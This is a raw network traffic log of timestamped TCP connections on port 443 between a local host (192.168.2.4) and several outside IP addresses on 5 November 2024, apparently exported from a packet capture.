                                                                                                                                    Nov 5, 2024 09:03:16.446443081 CET44349801188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.473562956 CET49801443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:03:16.473639965 CET44349801188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.473797083 CET49801443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:03:16.475418091 CET49800443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.475423098 CET4434980013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.476254940 CET49800443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.476258993 CET4434980013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.476707935 CET49798443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.476730108 CET4434979813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.477478027 CET49798443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.477485895 CET4434979813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.478813887 CET49799443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.478831053 CET4434979913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.479569912 CET49799443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.479574919 CET4434979913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.480211020 CET49797443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.480221987 CET4434979713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.481230021 CET49797443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.481234074 CET4434979713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.481384993 CET49796443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.481400013 CET4434979613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.482206106 CET49796443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.482211113 CET4434979613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.519325972 CET44349801188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.525326967 CET49801443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:03:16.611092091 CET4434979913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.611171007 CET4434979913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.611254930 CET49799443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.614810944 CET4434979813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.615438938 CET4434979813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.615447044 CET4434979713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.615495920 CET49798443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.615724087 CET4434979713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.615771055 CET49797443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.616076946 CET49799443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.616085052 CET4434979913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.616130114 CET49799443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.616137981 CET4434979913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.617842913 CET49798443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.617861032 CET4434979813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.617872953 CET49798443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.617877960 CET4434979813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.617949009 CET4434980013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.618000984 CET4434980013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.618033886 CET4434979613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.618102074 CET49800443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.618149042 CET4434979613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.618215084 CET49796443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.621834040 CET49800443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.621850967 CET4434980013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.621997118 CET49800443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.622003078 CET4434980013.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.623071909 CET49796443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.623078108 CET4434979613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.623116970 CET49796443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.623121023 CET4434979613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.624317884 CET49797443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.624321938 CET4434979713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.624371052 CET49797443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.624373913 CET4434979713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.629714012 CET49805443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.629728079 CET4434980513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.629909039 CET49805443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.631737947 CET49806443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.631763935 CET4434980613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.631864071 CET49806443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.632999897 CET49807443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.633007050 CET4434980713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.633163929 CET49807443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.633852959 CET49805443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.633862972 CET4434980513.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.635392904 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.636516094 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.636725903 CET49808443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.636749983 CET4434980813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.636863947 CET49808443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.637057066 CET49808443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.637070894 CET4434980813.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.637164116 CET49806443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.637175083 CET4434980613.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.637398005 CET49807443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.637409925 CET4434980713.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.638216972 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.638222933 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.638420105 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.638431072 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.639272928 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.639333010 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.639441967 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.639492989 CET49809443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.639504910 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.639508963 CET4434980913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.639580965 CET49809443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.639688969 CET49809443192.168.2.413.107.253.45
                                                                                                                                    Nov 5, 2024 09:03:16.639698982 CET4434980913.107.253.45192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.641813993 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.641891003 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.642529011 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.642587900 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.642731905 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.642740011 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.683417082 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.683829069 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.683835030 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.728564978 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.847227097 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.847270012 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.847310066 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.847331047 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.847341061 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.847376108 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.847410917 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.847419024 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.847425938 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.847451925 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.847465038 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.847548008 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.847553968 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.848093033 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.848144054 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.848150969 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.893332958 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.939729929 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.940258980 CET49810443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.940285921 CET44349810162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.940336943 CET49810443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.940702915 CET49810443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.940712929 CET44349810162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.941476107 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.941488028 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.941540003 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.941967964 CET49811443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.941978931 CET44349811162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.943099976 CET49812443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.943129063 CET44349812162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.943177938 CET49812443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.943346977 CET49812443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.943358898 CET44349812162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.951819897 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.951833010 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.951896906 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.952052116 CET49813443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.952061892 CET44349813162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.963886023 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.963963032 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.963994026 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.964001894 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.964009047 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.964056969 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.964466095 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.964654922 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.964685917 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.964694977 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.964700937 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.964744091 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.964750051 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.965501070 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.965545893 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.965545893 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.965559959 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.965595961 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.965604067 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.966434002 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.966471910 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.966481924 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.966487885 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.966533899 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:16.966540098 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.972210884 CET49814443192.168.2.4104.17.24.14
                                                                                                                                    Nov 5, 2024 09:03:16.972229958 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.972285032 CET49814443192.168.2.4104.17.24.14
                                                                                                                                    Nov 5, 2024 09:03:16.973351955 CET49816443192.168.2.4142.250.185.132
                                                                                                                                    Nov 5, 2024 09:03:16.973391056 CET44349816142.250.185.132192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.973443985 CET49816443192.168.2.4142.250.185.132
                                                                                                                                    Nov 5, 2024 09:03:16.974229097 CET49814443192.168.2.4104.17.24.14
                                                                                                                                    Nov 5, 2024 09:03:16.974248886 CET44349814104.17.24.14192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.974370003 CET49816443192.168.2.4142.250.185.132
                                                                                                                                    Nov 5, 2024 09:03:16.974384069 CET44349816142.250.185.132192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:16.987333059 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.005024910 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.005069971 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.005074978 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.005081892 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.005120993 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.005126953 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.055718899 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.080895901 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.080954075 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.080996990 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.081005096 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.081263065 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.081293106 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.081301928 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.081309080 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.081357002 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.081489086 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.081634998 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.081665993 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.081691980 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.081700087 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.081737041 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.082102060 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.082154989 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.082227945 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.082266092 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.082343102 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.083069086 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.083118916 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.083126068 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.083173037 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.083208084 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.083265066 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.084003925 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.084081888 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.084212065 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.084259033 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.085024118 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.085069895 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.085233927 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.085278988 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.101600885 CET44349801188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.101691961 CET44349801188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.101742029 CET49801443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:03:17.102560043 CET49801443192.168.2.4188.114.97.3
                                                                                                                                    Nov 5, 2024 09:03:17.102571011 CET44349801188.114.97.3192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.122212887 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.122267008 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.122268915 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.122277021 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.122308969 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.129769087 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.129820108 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.129859924 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.129863977 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.129877090 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.129919052 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.129926920 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.130008936 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.130047083 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.130676031 CET49803443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.130686998 CET44349803162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.130984068 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.131014109 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.131072044 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.131433010 CET49817443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.131448984 CET44349817162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.166378021 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.198081970 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.198091030 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.198141098 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.198225021 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.198271990 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.198679924 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.198724031 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.198836088 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.198878050 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.199047089 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.199085951 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.199286938 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.199328899 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.199330091 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.199341059 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.199368954 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.199501991 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.199544907 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.199552059 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.199584961 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.199939013 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.199981928 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.200140953 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.200186014 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.200285912 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.200333118 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.200489044 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.200530052 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.200998068 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.201036930 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.201051950 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.201056957 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.201076984 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.201189041 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.201230049 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.201236010 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.201278925 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.201421976 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.201476097 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.201884985 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.201935053 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.202085018 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.202126980 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.202322006 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.202353001 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.202363014 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.202368975 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.202385902 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.202948093 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.202996969 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.203001976 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.203026056 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.203039885 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.203046083 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.203067064 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.203125954 CET44349802162.159.140.34192.168.2.4
                                                                                                                                    Nov 5, 2024 09:03:17.203171015 CET49802443192.168.2.4162.159.140.34
                                                                                                                                    Nov 5, 2024 09:03:17.203176975 CET44349802162.159.140.34192.168.2.4
